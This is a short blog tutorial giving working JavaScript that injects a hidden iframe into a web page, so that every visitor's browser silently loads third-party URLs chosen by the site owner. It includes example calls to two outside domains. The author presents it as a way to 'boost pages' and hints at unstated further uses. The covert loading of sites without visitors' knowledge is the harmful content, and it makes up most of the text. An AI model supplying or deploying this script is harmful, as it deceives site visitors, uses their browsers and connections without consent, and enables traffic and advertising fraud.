How to Generate a INVISIBLE window to boost pages

The basic premise of this script is that every time a user enters your website, it will load the links (you have inserted into the code), but will not show it. There are many uses of this that I will not discuss here.

The more technical premise of this Javascript is that injects the code directly into the browsers DOM. The Document Object Model (DOM) is a cross-platform and language-independent convention for representing and interacting with objects in HTML)

<script type="text/javascript">
function invisibleWindow(iframeID, url) {

divel = document.createElement("div");
divel.id = "div" + iframeID;
divel.style.width = "25px";
divel.style.height = "25px";
divel.style.visibility = "hidden";

//Add div
document.body.appendChild(divel);

domiframe = document.createElement("iframe");
domiframe.id = iframeID;
domiframe.src = url;
domiframe.style.width = "25px";
domiframe.style.height = "25px";

var divid = document.getElementById("div" + iframeID);
divid.appendChild(domiframe);

}
</script>

You can call the code as many times as you want, but you must make each PARAMETER unique. This means that the parameter “ID1″ cannot be repeated.

<script type="text/javascript">
invisibleWindow("ID1", "http://www.thedomz.com");
invisibleWindow("ID2", "http://www.spikednet.com");
</script>



Leave a Reply